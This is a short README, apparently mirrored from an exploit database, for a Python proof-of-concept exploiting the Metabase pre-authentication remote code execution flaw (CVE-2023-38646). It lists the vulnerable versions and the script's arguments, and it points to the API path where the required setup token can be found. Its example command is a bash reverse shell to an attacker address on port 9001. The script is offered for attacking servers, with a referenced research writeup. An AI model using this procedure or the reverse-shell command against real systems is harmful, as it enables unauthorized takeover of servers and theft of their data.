Share
## https://sploitus.com/exploit?id=D71F3A02-C6FE-50AC-812F-5CEE39D846D4
# Metabase Pre-Auth RCE (CVE-2023-38646) POC
This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.

Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1

## Usage
```
python3 exploit.py -u URL -t TOKEN -c COMMAND
```
## Arguments
```
-h, --help            show this help message and exit
-u URL, --url URL     Target URL
-t TOKEN, --token TOKEN
                      Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
                      Command to be executed in the target host
```

## Example
![image](https://github.com/Pyr0sec/CVE-2023-38646/assets/74669749/705d63b5-4a52-42ae-bce7-4fb814883a79)

Command used: `bash -i >& /dev/tcp/10.10.14.26/9001 0>&1`

## References
[Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)